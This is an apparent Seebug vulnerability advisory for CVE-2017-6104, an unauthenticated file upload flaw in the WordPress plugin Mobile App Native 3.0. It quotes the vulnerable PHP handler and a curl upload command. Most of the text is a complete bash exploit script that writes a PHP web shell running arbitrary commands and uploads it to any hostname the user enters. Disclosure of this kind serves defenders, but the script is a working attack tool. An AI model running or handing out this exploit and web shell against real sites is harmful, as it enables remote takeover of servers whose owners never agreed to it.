Remote file upload vulnerability in Wordpress Plugin Mobile App Native 3.0

2017-03-03T00:00:00
ID SSV:92730
Type seebug
Reporter MYM
Modified 2017-03-03T00:00:00

Description

./ zen-mobile-app-native/server/images.php code for missing authentication

Mobile App WordPress plugin lets you turn your website into a full-featured mobile application in minutes using Mobile App Builder.

Vulnerability: The code in the file

./ zen-mobile-app-native/server/images.php doesn't require authentication or check that the user is allowed to upload content. It also doesn't sanitize the file upload against executable code. `` <? php //header('content-type: text/html; charset=iso-8859-2'); header('Content-Type: text/html; charset=utf-8'); header('Access-Control-Allow-Origin: *'); require_once('function.php');

 if ($_FILES['file']['name']) {
 if (!$ _FILES['file']['error']) {
 $name = md5(rand(100, 200));
 $ext = explode('.', $_FILES['file']['name']);
 $filename = $name . '.' . $ext[1];
 $destination = 'images/' . $filename;
 $location = $_FILES["file"]["tmp_name"];
 move_uploaded_file($location, $destination);
 echo $plugin_url.'/ server/images/' . $filename;
}
 else {
 echo $message = 'Ooops! Your upload triggered the following error: '.$ _FILES['file']['error'];
}
}

``

CVEIDs: CVE-2017-6104 Trojan: $ curl-F "file=@/var/www/shell.php" "http://example.com/wordpress/wp-content/plugins/zen-mobile-app-native/server/images.php"; http://example.com/wordpress/wp-content/plugins/zen-mobile-app-native//server/images/8d5e957f297893487bd98fa830fa6413.php

https://github.com/lcashdol/Exploits/blob/master/mobile_plugin_exploit.sh

                                        
                                            
                                                #!/bin/bash
#Exploit for the Wordpress Plugin Mobile App Native 3.0 file upload I posted.
#CVE-2017-6104
#Larry W. Cashdollar,@_larry0
#v1.0

cat &gt; shell.php &lt;&lt; -EOF-
&lt;?php
if(isset(\$_REQUEST[‘cmd’])){
        echo "&lt;pre&gt;";
        \$cmd = (\$_REQUEST[‘cmd’]);
        system(\$cmd);
        echo "&lt;/pre&gt;";
} else { echo "Please supply a command cmd"; }
?&gt;
-EOF-

red='\033[0;31m'
NC='\033[0m' # No Color

while [ true ]; do 
 echo -e ${red};
 echo -e "		Mobile App Native 3.0 File Upload PoC Redux $NC";
 echo "					3/1/2017";
 echo "			   Larry W. Cashdollar, @_larry0";
 echo
 echo "				  CVE-2017-6104";
 echo "- Advisory -";
 echo "http://www.vapid.dhs.org/advisory.php?v=178";
 echo
 echo "Ctrl ^C to exit";
 echo -n "Enter Target Hostname :";
 read target;
 echo "[+] Hostname $target";
 echo "[+] Exploiting Plugin";
 echo
 RESULT=`curl -# -F 'file=@shell.php' "http://$target/wp-content/plugins/zen-mobile-app-native/server/images.php"`;
 echo "[==========================================================================]"
 echo $RESULT
 echo "[==========================================================================]"
done